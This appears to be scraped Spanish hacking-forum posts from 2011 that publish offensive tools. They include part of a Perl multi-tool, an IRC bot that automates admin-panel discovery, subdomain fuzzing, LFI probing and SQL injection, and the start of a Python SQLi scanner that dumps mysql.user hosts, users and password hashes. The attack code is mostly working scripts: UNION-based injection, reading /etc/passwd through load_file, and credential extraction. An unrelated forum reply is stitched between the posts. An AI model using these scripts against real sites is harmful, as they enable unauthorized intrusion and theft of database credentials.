        my $banner = "\n\n-- == Project STALKER == --\n\n";
        cprint "\x0311";
        print $banner;
        cprint "\x030";
    }

    # Print the credits line in colour (cprint escapes: code 11, then reset).
    sub copyright {
        my $credits = "\n\n(C) Doddy Hackman 2011\n\n";
        cprint "\x0311";
        print $credits;
        cprint "\x030";
    }

    # GET a URL with the shared LWP client and return the response body.
    sub toma {
        my ($url) = @_;
        my $response = $nave->get($url);
        return $response->content;
    }

    # GET a URL with the shared LWP client and return the HTTP::Response
    # object itself (callers inspect is_success).
    sub tomax {
        my ($url) = @_;
        return $nave->get($url);
    }

    # POST the fields in the hash reference $fields to $url and return the
    # response body.
    # NOTE(review): $fields must be a real hash reference; a plain string
    # would be treated as a symbolic reference to a package hash.
    sub tomar {
        my ($url, $fields) = @_;
        my @form = %{$fields};
        return $nave->post($url, \@form)->content;
    }


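    # Open a TCP connection to $host:$port, send $command followed by CRLF,
    # read up to 5000 bytes of reply and return it with CRLF appended.
    # Fixes: a failed connect now warns and returns "" instead of dying on
    # an undefined socket; the reply buffer is lexical (the original reused
    # the package global $re, which base()/base_de() also write, so a short
    # or empty read could return stale data); and the indirect-object
    # constructor call is replaced by IO::Socket::INET->new.
    sub conectar {
        my ($host, $port, $command) = @_;

        my $sock = IO::Socket::INET->new(
            PeerAddr => $host,
            PeerPort => $port,
            Proto    => "tcp",
            Timeout  => 5,
        );
        unless ($sock) {
            warn "[-] Could not connect to $host:$port\n";
            return "";
        }

        print {$sock} $command . "\r\n";
        my $reply = "";
        $sock->read($reply, 5000);
        $sock->close;
        return $reply . "\r\n";
    }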


    # Interactive MySQL console over DBI: connect to $host:3306 as
    # $user/$pass with no default database and run whatever is typed at
    # "[+] Query :" until "exit", printing column names and rows.
    # NOTE(review): prepare()/execute() are not checked, so a statement the
    # server rejects at prepare time leaves $re undef and the next method
    # call dies.  DBI only guarantees rows() after non-SELECT statements;
    # a driver returning -1 for a SELECT would be reported as an error here.
    # $re and $info are package globals ($re is shared with base()/base_de()
    # and conectar()).  The password comes in as a command-line word (see
    # helpme) and is visible in the process list.
    sub enter {

    my ($host,$user,$pass) = @_;

    print "[+] Connecting to the server\n";

    # DBD::mysql's positional DSN form: dbi:mysql:<database>:<host>:<port>
    # with an empty database name.
    $info = "dbi:mysql::".$host.":3306";
    if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {

    print "\n[+] Enter in the database";

    while(1) {
    print "\n\n\n[+] Query : ";
    chomp(my $ac = <stdin>);

    if ($ac eq "exit") {
    $enter->disconnect;
    print "\n\n[+] Closing connection\n\n";
    last;
    }

    $re = $enter->prepare($ac);
    $re->execute();
    my $total = $re->rows();

    my @columnas = @{$re->{NAME}};

    # rows() == -1 is taken to mean the statement failed.
    if ($total eq "-1") {
    print "\n\n[-] Query Error\n";
    next;
    } else {
    print "\n\n[+] Result of the query\n";
    if ($total eq 0) {
    print "\n\n[+] Not rows returned\n\n";
    } else {
    print "\n\n[+] Rows returned : ".$total."\n\n\n";
    for(@columnas) {
    print $_."\t\t";
    }
    print "\n\n";
    while (@row = $re->fetchrow_array) {
    for(@row) {
    print $_."\t\t";
    }
    print "\n";
    }}}}
    } else {
    print "\n[-] Error connecting\n";
    }}

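    # Append one line ($_[1] plus newline) to the file named by $_[0].
    # Fix: uses a lexical handle with three-argument open and reports a
    # failed open/close with a warning instead of silently printing to an
    # unopened bareword handle.
    sub saveyes {
        my ($file, $line) = @_;
        open my $fh, '>>', $file or do {
            warn "[-] Cannot open $file: $!\n";
            return;
        };
        print {$fh} $line . "\n";
        close $fh or warn "[-] Cannot close $file: $!\n";
        return;
    }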

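    # Append one line ($_[1] plus newline) to logs/webs/<$_[0]>.
    # Fix: uses a lexical handle with three-argument open and warns when
    # the file cannot be opened (e.g. logs/webs/ missing) instead of
    # silently dropping the line.
    sub savefile {
        my ($name, $line) = @_;
        my $file = "logs/webs/" . $name;
        open my $fh, '>>', $file or do {
            warn "[-] Cannot open $file: $!\n";
            return;
        };
        print {$fh} $line . "\n";
        close $fh or warn "[-] Cannot close $file: $!\n";
        return;
    }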

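    # Return every entry of directory $_[0] (including "." and "..").
    # Fix: the original never checked opendir and then called close() on
    # the bareword DIR, which is a file handle, not closedir(); this uses a
    # lexical directory handle, warns and returns an empty list on failure.
    sub coleccionar {
        my ($dir) = @_;
        opendir my $dh, $dir or do {
            warn "[-] Cannot open directory $dir: $!\n";
            return;
        };
        my @entries = readdir $dh;
        closedir $dh;
        return @entries;
    }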

    # Print the command reference in colour (cprint escapes: code 10, then reset).
    sub helpme {
        my $usage = qq(

    Commands :


    getinfo
    getip <host>
    getlink <page>
    getprocess
    killprocess <name process> <pid process>
    conec <host> <port> <command>  
    allow <host>
    paths <page>
    encodehex <text>
    decodehex <text>
    encodeascii <text>
    decodeascii <text>
    encodebase <text>
    decodebase <text>
    scanport <host>
    panel <page>
    getpass <hash>
    kobra <page>
    ftp <host> <user> <pass>
    mysql <host> <user> <pass>
    navegator
    scangoogle
    help
    exit

    );
        cprint "\x0310";
        print $usage;
        cprint "\x030";
    }

    #
    #  The End ?
    #
Scripting / [Perl] Terr0r B0t By Doddy H
7 Octubre 2011, 15:55 PM
Hola a todos.

Hoy les traigo un programa que hice anoche: es un bot IRC, el cual
tiene las siguientes opciones:

* Codificación y decodificación de base64, hex y ascii
* Buscar el panel de administración de algún sitio
* Scan SQLI  (busca numero de columnas y da info)
* Tool para explotar LFI

Comandos para el bot en el canal (ojo: el bot no comprueba quién envía el comando, así que cualquiera que pueda escribir en el canal puede lanzar estos escaneos):


!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='


Forma de uso :


C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online




#!usr/bin/perl
#Terr0r B0t (C) Doddy Hackman 2010
#Commands to use
#
#!base64 encode/decode string
#!hex encode/decode string
#!ascii encode/decode string
#!panel http://127.0.0.1
#!sqli http://127.0.0.1/sql.php?id=
#!lfi http://127.0.0.1/lfi.php?file='
#
#





use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;



# Host-name prefixes tried by scan1() (the !fuzzdns command): each one is
# prepended to the target domain and fetched over HTTP.  Package global.
@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');


# Admin-panel paths tried by scan() (the !panel command), appended to the
# target URL after a "/".  Package global.
# NOTE(review): the list is wrapped across lines by the forum here
# ('controlpanel.ph' + 'p', 'admi' + 'n4_account/'); in the original file
# it is a single line.
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.ph
p','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admi
n4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');

# HTTP client shared by every scanner below: 13 s timeout and a Firefox 2
# user-agent string.
my $nave = LWP::UserAgent->new(
    timeout => 13,
    agent   => "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12",
);


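print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";

# Connection settings for the IRC server the bot joins.
# NOTE(review): the read loop below executes every command it sees without
# checking who sent it, so anyone able to get a line containing ":!sqli "
# (or the other commands) delivered to this connection can drive the bot.
my $servidor = "127.0.0.1"; # IRC server
my $canal = "#locos"; # channel to join on that server
my $nick = "Lepuke-Slave"; # bot nickname
my $port = "6667"; # IRC server port

print "[+] Starting the bot\n";

# Fix: the indirect-object form `new IO::Socket::INET(...)` is replaced by
# the explicit class-method call; behaviour is otherwise unchanged.
my $soquete = IO::Socket::INET->new(
    PeerAddr => $servidor,
    PeerPort => $port,
    Proto    => 'tcp',
);

if (!$soquete) {
    print "\n[-] No se puedo conectar en $servidor $port\n";
    exit 1;
}

# Minimal IRC registration, then join the channel.
print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";

print "[+] Online\n\n";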

# Main IRC read loop: every raw line from the server is checked against
# the command patterns.  Commands are matched anywhere in the line with
# no check of the sender prefix or of the target (channel vs. private
# message), so any delivered line containing ":!panel ", ":!sqli ",
# ":!fuzzdns " or ":!lfi " triggers a scan of the URL that follows it.
while ( my $log = <$soquete> ) {
chomp($log);

# Keep-alive: the capture includes the leading space and the ":server" text.
if ($log =~ /^PING(.*)$/i){
print $soquete "PONG $1\r\n";
}

if($log =~ m/:!panel (.*)$/g) {
scan($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!sqli (.*)$/g) {
print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
scan2($1);
}

if($log =~ m/:!fuzzdns (.*)$/g) {
scan1($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!lfi (.*)$/g) {
lfi($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}



# The "(.*) (.*)" split is greedy: the first capture takes everything up to
# the last space, so "encode a b" yields option "encode a" and the "??" reply.
if($log =~ m/:!base64 (.*) (.*)$/g) {
# `use` is compile-time, so this import is in effect for the whole file.
use MIME::Base64;
my ($opcion,$aa) = ($1,$2);
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ??\r\n";
}
}

if($log =~ m/:!ascii (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ???\r\n";
}
}

if($log =~ m/:!hex (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ????\r\n";
}
}
}

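# !lfi handler: confirm a local-file-inclusion point by PHP's "No such
# file or directory" warning (which also leaks the script path), then try
# each candidate from @buscar3 appended to the URL and report the ones
# that do not produce that warning.
# Fix: $ok was a package global that stayed set after the first hit, so
# later scans could never report "Dont found any file"; it is lexical now.
# NOTE(review): @buscar3 is not defined anywhere in this listing, so the
# fuzzing loop is empty as posted; and any response without the warning is
# counted as a hit, which over-reports on targets that answer with a
# different error page.
sub lfi {
    my ($target) = @_;
    print $soquete "PRIVMSG $canal : [+] Target confirmed : $target"."\r\n";
    print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
    my $code = toma($target);
    if ($code =~ /No such file or directory in <b>(.*)<\/b> on line/i) {
        my $path = $1;
        print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
        print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $path"."\r\n";
        print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
        my $ok = 0;
        for my $file (@buscar3) {
            my $code1 = toma($target.$file);
            unless ($code1 =~ /No such file or directory in <b>(.*)<\/b> on line/i) {
                $ok = 1;
                print $soquete "PRIVMSG $canal : [File Found] : ".$target.$file."\r\n";
            }
        }
        unless ($ok) {
            print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
        }
    } else {
        print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
    }
}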


# !fuzzdns handler: for every prefix in @dns request http://<prefix>.<domain>
# and report to the channel the ones that answer with an HTTP success.
sub scan1 {
    my ($domain) = @_;
    print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$domain."\r\n";
    for my $prefix (@dns) {
        my $candidate = "http://".$prefix.".".$domain;
        my $resp = tomax($candidate);
        print $soquete "PRIVMSG $canal : ".$candidate."\r\n" if $resp->is_success;
    }
}

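# !panel handler: try every path in @panels under the given base URL and
# report the ones that answer with an HTTP success status.
# Fixes: (1) $ct was a package global that stayed set after the first hit,
# so "Not found any path" was never sent again; it is lexical now.
# (2) The three PRIVMSG lines here lacked the ":" that marks the trailing
# parameter, unlike every other message in the file; without it the server
# takes only the first word ("[*]", "[Link]", "[-]") as the message text.
# NOTE(review): is_success() alone is the hit criterion, so a site serving a
# custom "not found" page with status 200 reports every path.
sub scan {
    my ($base) = @_;
    my $hits = 0;
    print $soquete "PRIVMSG $canal : [*] Searching panels to ".$base."\r\n";
    for my $candidate (@panels) {
        my $resp = tomax($base."/".$candidate);
        if ($resp->is_success) {
            print "\a";
            $hits = 1;
            print $soquete "PRIVMSG $canal : [Link] : ".$base."/".$candidate."\r\n";
        }
    }
    if (!$hits) {
        print $soquete "PRIVMSG $canal : [-] Not found any path\r\n";
    }
}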



# !sqli handler: probe the URL for a MySQL injection, find the column
# count with UNION SELECT and marker strings, locate a column that is
# echoed in the page and hand the resulting injection template to
# details().  Progress is reported to the channel.
# NOTE(review): bypass() is fed $ARGV[1], which is never set in this bot,
# so the separators always default to "+" and "--".  "$1" on the
# `my $path = $1` line refers to the preceding "different number of
# columns" match, which has no capture group, so $path is expected to be
# undef and the "Full Path Discloure" line never sent — verify.  The outer
# `my $rows` is shadowed by the loop variable, $_[1] is never passed in by
# the caller, and several globals ($pass1, $pass2, $inyection, $code,
# $code1, $alert, $total, $injection, $test, @number) are written.
sub scan2 {

my $rows  = "0";
my $asc;
my $page = $_[0];

($pass1,$pass2) = &bypass($ARGV[1]);
# Error-based check: a huge ORDER BY must produce a MySQL/PHP error.
$inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $path = $1;
chomp $path;
# Each column is filled with "RATSXPDOWN<n>RATSXPDOWN" so the one that is
# echoed back reveals its index.
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..52) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
if ($test=~/RATSXPDOWN(\d+)/) {
if ($path) {
print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
}
# Replace the first echoed column index with the "hackman" placeholder
# that details()/the other payload builders substitute.
$total=~s/@number[0]/hackman/;
print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
&details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
last;
}
}
}
}
}

# Given an injection template containing the "hackman" placeholder, probe
# what the injected query can reach and report it to the channel:
# information_schema.tables, mysql.user, load_file() (the hex literal
# 0x2f6574632f706173737764 is "/etc/passwd"), and finally version(),
# database() and user().  "ERTOR854" (char(69,82,84,79,82,56,53,52)) is the
# marker that brackets extracted values.
# NOTE(review): bypass() is fed $ARGV[1], which is never set in this bot,
# so the separators always default to "+" and "--"; $pass1/$pass2 and
# $test1..$test3/$code are package globals.
sub details {
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
if ($page=~/(.*)hackman(.*)/ig) {
my $start = $1; my $end = $2;
$test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
$test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
if ($test2=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
}
if ($test1=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
}
if ($test3=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
}
# Banner grab: version, current database and current user in one request.
$code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
} else {
print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
}
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
}

# Translate the comment-style option into the (separator, terminator)
# pair spliced into every injected query: "/*" -> "/**/" and "/*",
# "%20" -> "%20" and "%00", anything else -> "+" and "--".
sub bypass {
    my ($style) = @_;
    return ("/**/", "/*") if $style eq "/*";
    return ("%20", "%00") if $style eq "%20";
    return ("+", "--");
}


# Render a string as a comma-separated list of code points, the form
# MySQL's char() accepts (e.g. "ab" -> "97,98").
sub ascii {
    my ($text) = @_;
    my @codes = unpack("U*", $text);
    return join(",", @codes);
}

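# Inverse of ascii(): turn "97,98" back into "ab".
# Fix: the original assigned to $_[0], which is an alias of the caller's
# variable, so the argument was overwritten with the decoded text.  The
# argument is copied first now.
sub ascii_de {
    my ($csv) = @_;
    return join '', map { chr $_ } split /,/, $csv;
}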


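# Encode a string as a MySQL hex literal, e.g. "ab" -> "0x6162".
# Fix: each byte is zero-padded to two digits ("%02x"); the original "%x"
# emitted one digit for bytes below 0x10, which the pair-wise decode()
# then mis-read.
sub encode {
    my ($string) = @_;
    my $hex = '0x';
    for my $char (split //, $string) {
        $hex .= sprintf "%02x", ord $char;
    }
    return $hex;
}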

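# Decode a hex literal back to a string: an optional "0x" prefix is
# dropped and every two-digit pair becomes one character.
# Fix: the original ran s/// on $_[0], an alias of the caller's variable,
# stripping the prefix from the argument itself; it is copied first now.
sub decode {
    my ($text) = @_;
    $text =~ s/^0x//;
    my @pairs = $text =~ /../g;
    return join '', map { chr hex $_ } @pairs;
}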

# GET a URL with the shared LWP client and return the response body.
sub toma {
    my ($url) = @_;
    my $response = $nave->request(GET $url);
    return $response->content;
}

# GET a URL with the shared LWP client and return the HTTP::Response
# object (callers check is_success).
sub tomax {
    my ($url) = @_;
    return $nave->request(GET $url);
}

#The End





Millones , pero el unico del que me acuerdo el nombre es Captain Claw.
Es complicado: tenés que saber los comandos necesarios, como el típico ping/pong u otros; además no se me ocurre cómo hacer en un while una detección de los mensajes privados que te puedan enviar. Desde mi punto de vista es complicado, pero por lo que he leído es muy fácil de hacerlo en Delphi.
Eso sí, si lo que querés hacer es un bot y no un cliente, la cosa es diferente.
Scripting / [Python] SQL Scanner 0.3
7 Octubre 2011, 01:40 AM
Bueno, este es un simple scanner en Python que hice para SQLi.

Con las siguientes opciones:

  • Verifica vulnerabilidad
  • Busca columnas
  • Busca el numero milagroso y saca info sobre la DB
  • Saca tablas y columnas de la DB actual o de otra externa
  • Dumpear usuarios
  • Guarda todo en un log con el nombre de la web en la carpeta /logs



    #!usr/bin/python
    #SQL Scanner 0.3 (C) Doddy Hackman 2010

    import os,sys,urllib2,re,binascii
    from urlparse import urlparse

    def clean():
    if sys.platform=="win32":
     os.system("cls")
    else:
     os.system("clear")

    def savefile(name,text):
    file = open(name,"a")
    file.write("\n"+text+"\n")
    file.close()

    def gethost(test):
    return urlparse(test).netloc

    def header() :
    print "\n--== SQL Scanner ==--\n"

    def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)

    def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

    def toma(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
    op = urllib2.build_opener()
    return op.open(nave).read()

    def bypass(bypass):
    if bypass == "--":
     return("+","--")
    elif bypass == "/*":
     return("/**/","/*")
    else:
     return("+","--")


    def dumper(web,passx,table,col1,col2):

    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
    code1 = toma(web1+pass1+"from"+pass1+table+pass2)
    print "\n\n[+] Searching values\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] Values Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       c1 = re.findall("K0BRA(.*?)K0BRA",code2)
       c1 = c1[0]

       c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
       c2 = c2[0]
       print "["+col1+"] : "+c1
       print "["+col2+"] : "+c2+"\n"
       savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
       savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
    else:
     print "[-] Not Found\n"



    def mysqluser(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    print "\n\n[+] Searching mysql.user\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     print "[+] mysql.user : ON"
     savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
     savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
     print "[+] Users Found : ",numbers,"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       host = re.findall("K0BRA(.*?)K0BRA",code2)
       host = host[0]

       user = re.findall("K0BRA1(.*?)K0BRA1",code2)
       user = user[0]

       passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
       passw = passw[0]
       savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
       savefile("logs/"+gethost(web)+".txt","[User] : "+user)
       savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
       print "[Host] : "+host
       print "[User] : "+user
       print "[Pass] : "+passw+"\n"    
    else:
     print "[-] Not Found\n"



    def showcolumnsdb(web,db,table,passx):
    db = "0x"+str(binascii.hexlify(db))
    table = "0x"+str(binascii.hexlify(table))
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching columns in DB\n\n"
